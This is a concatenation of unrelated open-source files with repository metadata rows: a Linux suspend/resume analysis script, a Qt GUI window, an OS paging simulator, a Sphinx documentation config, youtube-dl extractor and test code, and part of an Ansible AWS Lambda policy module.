if(re.match('.*_ftrace.txt', filename)):
files.append("%s/%s" % (dirname, filename))
# process the files in order and get an array of data objects
testruns = []
for file in sorted(files):
if output:
print("Test found in %s" % os.path.dirname(file))
sysvals.ftracefile = file
sysvals.dmesgfile = file.replace('_ftrace.txt', '_dmesg.txt')
doesTraceLogHaveTraceEvents()
sysvals.usecallgraph = False
if not sysvals.usetraceeventsonly:
if(not os.path.exists(sysvals.dmesgfile)):
print("Skipping %s: not a valid test input" % file)
continue
else:
if output:
f = os.path.basename(sysvals.ftracefile)
d = os.path.basename(sysvals.dmesgfile)
print("\tInput files: %s and %s" % (f, d))
testdata = loadKernelLog()
data = testdata[0]
parseKernelLog(data)
testdata = [data]
appendIncompleteTraceLog(testdata)
else:
if output:
print("\tInput file: %s" % os.path.basename(sysvals.ftracefile))
testdata = parseTraceLog()
data = testdata[0]
data.normalizeTime(data.tSuspended)
link = file.replace(subdir+'/', '').replace('_ftrace.txt', '.html')
data.outfile = link
testruns.append(data)
createHTMLSummarySimple(testruns, subdir+'/summary.html')
# Function: printHelp
# Description:
# print out the help text
def printHelp():
global sysvals
modes = getModes()
print('')
print('AnalyzeSuspend v%.1f' % sysvals.version)
print('Usage: sudo analyze_suspend.py <options>')
print('')
print('Description:')
print(' This tool is designed to assist kernel and OS developers in optimizing')
print(' their linux stack\'s suspend/resume time. Using a kernel image built')
print(' with a few extra options enabled, the tool will execute a suspend and')
print(' capture dmesg and ftrace data until resume is complete. This data is')
print(' transformed into a device timeline and an optional callgraph to give')
print(' a detailed view of which devices/subsystems are taking the most')
print(' time in suspend/resume.')
print('')
print(' Generates output files in subdirectory: suspend-mmddyy-HHMMSS')
print(' HTML output: <hostname>_<mode>.html')
print(' raw dmesg output: <hostname>_<mode>_dmesg.txt')
print(' raw ftrace output: <hostname>_<mode>_ftrace.txt')
print('')
print('Options:')
print(' [general]')
print(' -h Print this help text')
print(' -v Print the current tool version')
print(' -verbose Print extra information during execution and analysis')
print(' -status Test to see if the system is enabled to run this tool')
print(' -modes List available suspend modes')
print(' -m mode Mode to initiate for suspend %s (default: %s)') % (modes, sysvals.suspendmode)
print(' -rtcwake t Use rtcwake to autoresume after <t> seconds (default: disabled)')
print(' [advanced]')
print(' -f Use ftrace to create device callgraphs (default: disabled)')
print(' -filter "d1 d2 ..." Filter out all but this list of dev names')
print(' -x2 Run two suspend/resumes back to back (default: disabled)')
print(' -x2delay t Minimum millisecond delay <t> between the two test runs (default: 0 ms)')
print(' -postres t Time after resume completion to wait for post-resume events (default: 0 S)')
print(' -multi n d Execute <n> consecutive tests at <d> seconds intervals. The outputs will')
print(' be created in a new subdirectory with a summary page.')
print(' [utilities]')
print(' -fpdt Print out the contents of the ACPI Firmware Performance Data Table')
print(' -usbtopo Print out the current USB topology with power info')
print(' -usbauto Enable autosuspend for all connected USB devices')
print(' [android testing]')
print(' -adb binary Use the given adb binary to run the test on an android device.')
print(' The device should already be connected and with root access.')
print(' Commands will be executed on the device using "adb shell"')
print(' [re-analyze data from previous runs]')
print(' -ftrace ftracefile Create HTML output using ftrace input')
print(' -dmesg dmesgfile Create HTML output using dmesg (not needed for kernel >= 3.15)')
print(' -summary directory Create a summary of all test in this dir')
print('')
return True
# ----------------- MAIN --------------------
# exec start (skipped if script is loaded as library)
if __name__ == '__main__':
cmd = ''
cmdarg = ''
multitest = {'run': False, 'count': 0, 'delay': 0}
# loop through the command line arguments
args = iter(sys.argv[1:])
for arg in args:
if(arg == '-m'):
try:
val = args.next()
except:
doError('No mode supplied', True)
sysvals.suspendmode = val
elif(arg == '-adb'):
try:
val = args.next()
except:
doError('No adb binary supplied', True)
if(not os.path.exists(val)):
doError('file doesnt exist: %s' % val, False)
if(not os.access(val, os.X_OK)):
doError('file isnt executable: %s' % val, False)
try:
check = os.popen(val+' version').read().strip()
except:
doError('adb version failed to execute', False)
if(not re.match('Android Debug Bridge .*', check)):
doError('adb version failed to execute', False)
sysvals.adb = val
sysvals.android = True
elif(arg == '-x2'):
if(sysvals.postresumetime > 0):
doError('-x2 is not compatible with -postres', False)
sysvals.execcount = 2
elif(arg == '-x2delay'):
sysvals.x2delay = getArgInt('-x2delay', args, 0, 60000)
elif(arg == '-postres'):
if(sysvals.execcount != 1):
doError('-x2 is not compatible with -postres', False)
sysvals.postresumetime = getArgInt('-postres', args, 0, 3600)
elif(arg == '-f'):
sysvals.usecallgraph = True
elif(arg == '-modes'):
cmd = 'modes'
elif(arg == '-fpdt'):
cmd = 'fpdt'
elif(arg == '-usbtopo'):
cmd = 'usbtopo'
elif(arg == '-usbauto'):
cmd = 'usbauto'
elif(arg == '-status'):
cmd = 'status'
elif(arg == '-verbose'):
sysvals.verbose = True
elif(arg == '-v'):
print("Version %.1f" % sysvals.version)
sys.exit()
elif(arg == '-rtcwake'):
sysvals.rtcwake = True
sysvals.rtcwaketime = getArgInt('-rtcwake', args, 0, 3600)
elif(arg == '-multi'):
multitest['run'] = True
multitest['count'] = getArgInt('-multi n (exec count)', args, 2, 1000000)
multitest['delay'] = getArgInt('-multi d (delay between tests)', args, 0, 3600)
elif(arg == '-dmesg'):
try:
val = args.next()
except:
doError('No dmesg file supplied', True)
sysvals.notestrun = True
sysvals.dmesgfile = val
if(os.path.exists(sysvals.dmesgfile) == False):
doError('%s doesnt exist' % sysvals.dmesgfile, False)
elif(arg == '-ftrace'):
try:
val = args.next()
except:
doError('No ftrace file supplied', True)
sysvals.notestrun = True
sysvals.usecallgraph = True
sysvals.ftracefile = val
if(os.path.exists(sysvals.ftracefile) == False):
doError('%s doesnt exist' % sysvals.ftracefile, False)
elif(arg == '-summary'):
try:
val = args.next()
except:
doError('No directory supplied', True)
cmd = 'summary'
cmdarg = val
sysvals.notestrun = True
if(os.path.isdir(val) == False):
doError('%s isnt accesible' % val, False)
elif(arg == '-filter'):
try:
val = args.next()
except:
doError('No devnames supplied', True)
sysvals.setDeviceFilter(val)
elif(arg == '-h'):
printHelp()
sys.exit()
else:
doError('Invalid argument: '+arg, True)
# just run a utility command and exit
if(cmd != ''):
if(cmd == 'status'):
statusCheck()
elif(cmd == 'fpdt'):
if(sysvals.android):
doError('cannot read FPDT on android device', False)
getFPDT(True)
elif(cmd == 'usbtopo'):
if(sysvals.android):
doError('cannot read USB topology '+\
'on an android device', False)
detectUSB(True)
elif(cmd == 'modes'):
modes = getModes()
print modes
elif(cmd == 'usbauto'):
setUSBDevicesAuto()
elif(cmd == 'summary'):
print("Generating a summary of folder \"%s\"" % cmdarg)
runSummary(cmdarg, True)
sys.exit()
# run test on android device
if(sysvals.android):
if(sysvals.usecallgraph):
doError('ftrace (-f) is not yet supported '+\
'in the android kernel', False)
if(sysvals.notestrun):
doError('cannot analyze test files on the '+\
'android device', False)
# if instructed, re-analyze existing data files
if(sysvals.notestrun):
rerunTest()
sys.exit()
# verify that we can run a test
if(not statusCheck()):
print('Check FAILED, aborting the test run!')
sys.exit()
if multitest['run']:
# run multiple tests in a separte subdirectory
s = 'x%d' % multitest['count']
subdir = datetime.now().strftime('suspend-'+s+'-%m%d%y-%H%M%S')
os.mkdir(subdir)
for i in range(multitest['count']):
if(i != 0):
print('Waiting %d seconds...' % (multitest['delay']))
time.sleep(multitest['delay'])
print('TEST (%d/%d) START' % (i+1, multitest['count']))
runTest(subdir)
print('TEST (%d/%d) COMPLETE' % (i+1, multitest['count']))
runSummary(subdir, False)
else:
# run the test in the current directory
runTest(".")
|
gpl-2.0
|
tuxxi/OpenBurn
|
openburn/ui/mainwindow.py
|
1
|
3263
|
from qtpy.QtWidgets import (QWidget, QFrame, QMainWindow, QMenuBar, QStatusBar, QAction, QApplication,
QTabWidget, QVBoxLayout)
from qtpy.QtGui import QIcon
from openburn import RESOURCE_PATH
from openburn.ui.dialogs.about import AboutDialog
from openburn.ui.designtab import DesignTab
class MainWindow(QMainWindow):
"""OpenBurn's main window"""
title = "OpenBurn"
def __init__(self):
super(MainWindow, self).__init__()
self.setWindowTitle(self.title)
self.setGeometry(100, 100, 800, 600)
self.setWindowIcon(QIcon(RESOURCE_PATH + "icons/nakka-finocyl.gif"))
self.create_default_widgets()
self.setup_ui()
def create_default_widgets(self):
"""Creates static widgets such as menubar and statusbar"""
def create_menubar():
"""Create menu bar and populate it with sub menu actions"""
def file_menu():
"""Create a file submenu"""
self.file_sub_menu = self.menubar.addMenu('File')
self.open_action = QAction('Open File', self)
self.open_action.setStatusTip('Open a new design')
self.open_action.setShortcut('CTRL+O')
# self.open_action.triggered.connect(self.open_file)
self.exit_action = QAction('Exit', self)
self.exit_action.setStatusTip('Exit the application.')
self.exit_action.setShortcut('CTRL+Q')
self.exit_action.triggered.connect(QApplication.quit)
self.file_sub_menu.addAction(self.open_action)
self.file_sub_menu.addAction(self.exit_action)
def edit_menu():
self.edit_dub_menu = self.menubar.addMenu('Edit')
def tools_menu():
self.edit_dub_menu = self.menubar.addMenu('Tools')
def help_menu():
"""Create help submenu"""
self.help_sub_menu = self.menubar.addMenu('Help')
self.about_action = QAction('About', self)
self.about_action.setStatusTip('About the application.')
self.about_action.setShortcut('CTRL+H')
self.about_action.triggered.connect(self.about_dialog.exec_)
self.help_sub_menu.addAction(self.about_action)
self.menubar = QMenuBar(self)
file_menu()
edit_menu()
tools_menu()
help_menu()
def create_statusbar():
self.statusbar = QStatusBar(self)
self.statusbar.showMessage("Ready", 0)
self.about_dialog = AboutDialog(self)
create_menubar()
self.setMenuBar(self.menubar)
create_statusbar()
self.setStatusBar(self.statusbar)
def setup_ui(self):
"""setup the tab widget UI"""
self.tab_widget = QTabWidget()
self.tab_widget.addTab(DesignTab(), "Design")
self.tab_widget.addTab(QWidget(), "Simulation")
self.tab_widget.addTab(QWidget(), "Propellants")
self.layout = QVBoxLayout()
self.layout.addWidget(self.tab_widget)
self.frame = QFrame()
self.frame.setLayout(self.layout)
self.setCentralWidget(self.frame)
|
gpl-3.0
|
dpatrickx/course-ucore-lab
|
related_info/ostep/ostep4-paging-linear-translate.py
|
54
|
6658
|
#! /usr/bin/env python
import sys
from optparse import OptionParser
import random
import math
def mustbepowerof2(bits, size, msg):
if math.pow(2,bits) != size:
print 'Error in argument: %s' % msg
sys.exit(1)
def mustbemultipleof(bignum, num, msg):
if (int(float(bignum)/float(num)) != (int(bignum) / int(num))):
print 'Error in argument: %s' % msg
sys.exit(1)
def convert(size):
length = len(size)
lastchar = size[length-1]
if (lastchar == 'k') or (lastchar == 'K'):
m = 1024
nsize = int(size[0:length-1]) * m
elif (lastchar == 'm') or (lastchar == 'M'):
m = 1024*1024
nsize = int(size[0:length-1]) * m
elif (lastchar == 'g') or (lastchar == 'G'):
m = 1024*1024*1024
nsize = int(size[0:length-1]) * m
else:
nsize = int(size)
return nsize
#
# main program
#
parser = OptionParser()
parser.add_option('-A', '--addresses', default='-1',
help='a set of comma-separated pages to access; -1 means randomly generate',
action='store', type='string', dest='addresses')
parser.add_option('-s', '--seed', default=0, help='the random seed', action='store', type='int', dest='seed')
parser.add_option('-a', '--asize', default='16k', help='address space size (e.g., 16, 64k, 32m, 1g)', action='store', type='string', dest='asize')
parser.add_option('-p', '--physmem', default='64k', help='physical memory size (e.g., 16, 64k, 32m, 1g)', action='store', type='string', dest='psize')
parser.add_option('-P', '--pagesize', default='4k', help='page size (e.g., 4k, 8k, whatever)', action='store', type='string', dest='pagesize')
parser.add_option('-n', '--numaddrs', default=5, help='number of virtual addresses to generate', action='store', type='int', dest='num')
parser.add_option('-u', '--used', default=50, help='percent of virtual address space that is used', action='store', type='int', dest='used')
parser.add_option('-v', help='verbose mode', action='store_true', default=False, dest='verbose')
parser.add_option('-c', help='compute answers for me', action='store_true', default=False, dest='solve')
(options, args) = parser.parse_args()
print 'ARG seed', options.seed
print 'ARG address space size', options.asize
print 'ARG phys mem size', options.psize
print 'ARG page size', options.pagesize
print 'ARG verbose', options.verbose
print 'ARG addresses', options.addresses
print ''
random.seed(options.seed)
asize = convert(options.asize)
psize = convert(options.psize)
pagesize = convert(options.pagesize)
addresses = str(options.addresses)
if psize <= 1:
print 'Error: must specify a non-zero physical memory size.'
exit(1)
if asize < 1:
print 'Error: must specify a non-zero address-space size.'
exit(1)
if psize <= asize:
print 'Error: physical memory size must be GREATER than address space size (for this simulation)'
exit(1)
if psize >= convert('1g') or asize >= convert('1g'):
print 'Error: must use smaller sizes (less than 1 GB) for this simulation.'
exit(1)
mustbemultipleof(asize, pagesize, 'address space must be a multiple of the pagesize')
mustbemultipleof(psize, pagesize, 'physical memory must be a multiple of the pagesize')
# print some useful info, like the darn page table
pages = psize / pagesize;
import array
used = array.array('i')
pt = array.array('i')
for i in range(0,pages):
used.insert(i,0)
vpages = asize / pagesize
# now, assign some pages of the VA
vabits = int(math.log(float(asize))/math.log(2.0))
mustbepowerof2(vabits, asize, 'address space must be a power of 2')
pagebits = int(math.log(float(pagesize))/math.log(2.0))
mustbepowerof2(pagebits, pagesize, 'page size must be a power of 2')
vpnbits = vabits - pagebits
pagemask = (1 << pagebits) - 1
# import ctypes
# vpnmask = ctypes.c_uint32(~pagemask).value
vpnmask = 0xFFFFFFFF & ~pagemask
#if vpnmask2 != vpnmask:
# print 'ERROR'
# exit(1)
# print 'va:%d page:%d vpn:%d -- %08x %08x' % (vabits, pagebits, vpnbits, vpnmask, pagemask)
print ''
print 'The format of the page table is simple:'
print 'The high-order (left-most) bit is the VALID bit.'
print ' If the bit is 1, the rest of the entry is the PFN.'
print ' If the bit is 0, the page is not valid.'
print 'Use verbose mode (-v) if you want to print the VPN # by'
print 'each entry of the page table.'
print ''
print 'Page Table (from entry 0 down to the max size)'
for v in range(0,vpages):
done = 0
while done == 0:
if ((random.random() * 100.0) > (100.0 - float(options.used))):
u = int(pages * random.random())
if used[u] == 0:
done = 1
# print '%8d - %d' % (v, u)
if options.verbose == True:
print ' [%8d] ' % v,
else:
print ' ',
print '0x%08x' % (0x80000000 | u)
pt.insert(v,u)
else:
# print '%8d - not valid' % v
if options.verbose == True:
print ' [%8d] ' % v,
else:
print ' ',
print '0x%08x' % 0
pt.insert(v,-1)
done = 1
print ''
#
# now, need to generate virtual address trace
#
addrList = []
if addresses == '-1':
# need to generate addresses
for i in range(0, options.num):
n = int(asize * random.random())
addrList.append(n)
else:
addrList = addresses.split(',')
print 'Virtual Address Trace'
for vStr in addrList:
# vaddr = int(asize * random.random())
vaddr = int(vStr)
if options.solve == False:
print ' VA 0x%08x (decimal: %8d) --> PA or invalid address?' % (vaddr, vaddr)
else:
paddr = 0
# split vaddr into VPN | offset
vpn = (vaddr & vpnmask) >> pagebits
if pt[vpn] < 0:
print ' VA 0x%08x (decimal: %8d) --> Invalid (VPN %d not valid)' % (vaddr, vaddr, vpn)
else:
pfn = pt[vpn]
offset = vaddr & pagemask
paddr = (pfn << pagebits) | offset
print ' VA 0x%08x (decimal: %8d) --> %08x (decimal %8d) [VPN %d]' % (vaddr, vaddr, paddr, paddr, vpn)
print ''
if options.solve == False:
print 'For each virtual address, write down the physical address it translates to'
print 'OR write down that it is an out-of-bounds address (e.g., segfault).'
print ''
|
gpl-2.0
|
ekalosak/server
|
docs/source/conf.py
|
5
|
9261
|
# -*- coding: utf-8 -*-
#
# GA4GH documentation build configuration file, created by
# sphinx-quickstart on Wed Apr 1 14:35:20 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'GA4GH'
copyright = u'2015, Global Alliance for Genomics and Health'
author = u'Global Alliance for Genomics and Health'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1.0a2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'GA4GHdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'GA4GH.tex', u'GA4GH Documentation',
u'Global Alliance for Genomics and Health', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = "_static/logo_ga.png"
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'ga4gh', u'GA4GH Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'GA4GH', u'GA4GH Documentation',
author, 'GA4GH', 'A reference implementation of the ga4gh API.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
apache-2.0
|
rbrito/pkg-youtube-dl
|
youtube_dl/extractor/bet.py
|
64
|
2783
|
from __future__ import unicode_literals
from .mtv import MTVServicesInfoExtractor
from ..utils import unified_strdate
class BetIE(MTVServicesInfoExtractor):
_VALID_URL = r'https?://(?:www\.)?bet\.com/(?:[^/]+/)+(?P<id>.+?)\.html'
_TESTS = [
{
'url': 'http://www.bet.com/news/politics/2014/12/08/in-bet-exclusive-obama-talks-race-and-racism.html',
'info_dict': {
'id': '07e96bd3-8850-3051-b856-271b457f0ab8',
'display_id': 'in-bet-exclusive-obama-talks-race-and-racism',
'ext': 'flv',
'title': 'A Conversation With President Obama',
'description': 'President Obama urges persistence in confronting racism and bias.',
'duration': 1534,
'upload_date': '20141208',
'thumbnail': r're:(?i)^https?://.*\.jpg$',
'subtitles': {
'en': 'mincount:2',
}
},
'params': {
# rtmp download
'skip_download': True,
},
},
{
'url': 'http://www.bet.com/video/news/national/2014/justice-for-ferguson-a-community-reacts.html',
'info_dict': {
'id': '9f516bf1-7543-39c4-8076-dd441b459ba9',
'display_id': 'justice-for-ferguson-a-community-reacts',
'ext': 'flv',
'title': 'Justice for Ferguson: A Community Reacts',
'description': 'A BET News special.',
'duration': 1696,
'upload_date': '20141125',
'thumbnail': r're:(?i)^https?://.*\.jpg$',
'subtitles': {
'en': 'mincount:2',
}
},
'params': {
# rtmp download
'skip_download': True,
},
}
]
_FEED_URL = "http://feeds.mtvnservices.com/od/feed/bet-mrss-player"
def _get_feed_query(self, uri):
return {
'uuid': uri,
}
def _extract_mgid(self, webpage):
return self._search_regex(r'data-uri="([^"]+)', webpage, 'mgid')
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
mgid = self._extract_mgid(webpage)
videos_info = self._get_videos_info(mgid)
info_dict = videos_info['entries'][0]
upload_date = unified_strdate(self._html_search_meta('date', webpage))
description = self._html_search_meta('description', webpage)
info_dict.update({
'display_id': display_id,
'description': description,
'upload_date': upload_date,
})
return info_dict
|
unlicense
|
Facetracker-project/facetracker-core
|
lib/youtube-dl/test/test_age_restriction.py
|
171
|
1379
|
#!/usr/bin/env python
from __future__ import unicode_literals
# Allow direct execution
import os
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from test.helper import try_rm
from youtube_dl import YoutubeDL
def _download_restricted(url, filename, age):
""" Returns true if the file has been downloaded """
params = {
'age_limit': age,
'skip_download': True,
'writeinfojson': True,
'outtmpl': '%(id)s.%(ext)s',
}
ydl = YoutubeDL(params)
ydl.add_default_info_extractors()
json_filename = os.path.splitext(filename)[0] + '.info.json'
try_rm(json_filename)
ydl.download([url])
res = os.path.exists(json_filename)
try_rm(json_filename)
return res
class TestAgeRestriction(unittest.TestCase):
def _assert_restricted(self, url, filename, age, old_age=None):
self.assertTrue(_download_restricted(url, filename, old_age))
self.assertFalse(_download_restricted(url, filename, age))
def test_youtube(self):
self._assert_restricted('07FYdnEawAQ', '07FYdnEawAQ.mp4', 10)
def test_youporn(self):
self._assert_restricted(
'http://www.youporn.com/watch/505835/sex-ed-is-it-safe-to-masturbate-daily/',
'505835.mp4', 2, old_age=25)
if __name__ == '__main__':
unittest.main()
|
gpl-2.0
|
kbrebanov/ansible
|
lib/ansible/modules/cloud/amazon/lambda_policy.py
|
7
|
13778
|
#!/usr/bin/python
# Copyright (c) 2016, Pierre Jodouin <pjodouin@virtualcomputing.solutions>
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: lambda_policy
short_description: Creates, updates or deletes AWS Lambda policy statements.
description:
- This module allows the management of AWS Lambda policy statements.
It is idempotent and supports "Check" mode. Use module M(lambda) to manage the lambda
function itself, M(lambda_alias) to manage function aliases, M(lambda_event) to manage event source mappings
such as Kinesis streams, M(lambda_invoke) to execute a lambda function and M(lambda_facts) to gather facts
relating to one or more lambda functions.
version_added: "2.4"
author:
- Pierre Jodouin (@pjodouin)
- Michael De La Rue (@mikedlr)
options:
function_name:
description:
- "Name of the Lambda function whose resource policy you are updating by adding a new permission."
- "You can specify a function name (for example, Thumbnail ) or you can specify Amazon Resource Name (ARN) of the"
- "function (for example, arn:aws:lambda:us-west-2:account-id:function:ThumbNail ). AWS Lambda also allows you to"
- "specify partial ARN (for example, account-id:Thumbnail ). Note that the length constraint applies only to the"
- "ARN. If you specify only the function name, it is limited to 64 character in length."
required: true
aliases: ['lambda_function_arn', 'function_arn']
state:
description:
- Describes the desired state.
required: true
default: "present"
choices: ["present", "absent"]
alias:
description:
- Name of the function alias. Mutually exclusive with C(version).
version:
description:
- Version of the Lambda function. Mutually exclusive with C(alias).
statement_id:
description:
- A unique statement identifier.
required: true
aliases: ['sid']
action:
description:
- "The AWS Lambda action you want to allow in this statement. Each Lambda action is a string starting with
lambda: followed by the API name (see Operations ). For example, lambda:CreateFunction . You can use wildcard
(lambda:* ) to grant permission for all AWS Lambda actions."
required: true
principal:
description:
- "The principal who is getting this permission. It can be Amazon S3 service Principal (s3.amazonaws.com ) if
you want Amazon S3 to invoke the function, an AWS account ID if you are granting cross-account permission, or
any valid AWS service principal such as sns.amazonaws.com . For example, you might want to allow a custom
application in another AWS account to push events to AWS Lambda by invoking your function."
required: true
source_arn:
description:
- This is optional; however, when granting Amazon S3 permission to invoke your function, you should specify this
field with the bucket Amazon Resource Name (ARN) as its value. This ensures that only events generated from
the specified bucket can invoke the function.
source_account:
description:
- The AWS account ID (without a hyphen) of the source owner. For example, if the SourceArn identifies a bucket,
then this is the bucket owner's account ID. You can use this additional condition to ensure the bucket you
specify is owned by a specific account (it is possible the bucket owner deleted the bucket and some other AWS
account created the bucket). You can also use this condition to specify all sources (that is, you don't
specify the SourceArn ) owned by a specific account.
event_source_token:
description:
- Token string representing source ARN or account. Mutually exclusive with C(source_arn) or C(source_account).
requirements:
- boto3
extends_documentation_fragment:
- aws
'''
EXAMPLES = '''
---
- hosts: localhost
gather_facts: no
vars:
state: present
tasks:
- name: Lambda S3 event notification
lambda_policy:
state: "{{ state | default('present') }}"
function_name: functionName
alias: Dev
statement_id: lambda-s3-myBucket-create-data-log
action: lambda:InvokeFunction
principal: s3.amazonaws.com
source_arn: arn:aws:s3:eu-central-1:123456789012:bucketName
source_account: 123456789012
- name: show results
debug: var=lambda_policy_action
'''
RETURN = '''
---
lambda_policy_action:
description: describes what action was taken
returned: success
type: string
'''
import json
import re
from ansible.module_utils._text import to_native
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import get_aws_connection_info, boto3_conn
try:
from botocore.exceptions import ClientError
except:
pass # will be protected by AnsibleAWSModule
def pc(key):
"""
Changes python key into Pascal case equivalent. For example, 'this_function_name' becomes 'ThisFunctionName'.
:param key:
:return:
"""
return "".join([token.capitalize() for token in key.split('_')])
def policy_equal(module, current_statement):
for param in ('action', 'principal', 'source_arn', 'source_account', 'event_source_token'):
if module.params.get(param) != current_statement.get(param):
return False
return True
def set_api_params(module, module_params):
"""
Sets module parameters to those expected by the boto3 API.
:param module:
:param module_params:
:return:
"""
api_params = dict()
for param in module_params:
module_param = module.params.get(param)
if module_param is not None:
api_params[pc(param)] = module_param
return api_params
def validate_params(module):
"""
Performs parameter validation beyond the module framework's validation.
:param module:
:return:
"""
function_name = module.params['function_name']
# validate function name
if function_name.startswith('arn:'):
if not re.search(r'^[\w\-]+$', function_name):
module.fail_json(
msg='Function name {0} is invalid. Names must contain only alphanumeric characters and hyphens.'.format(
function_name)
)
if len(function_name) > 64:
module.fail_json(
msg='Function name "{0}" exceeds 64 character limit'.format(function_name))
else:
if not re.search(r'^[\w\-:]+$', function_name):
module.fail_json(
msg='ARN {0} is invalid. ARNs must contain only alphanumeric characters, hyphens and colons.'.format(function_name)
)
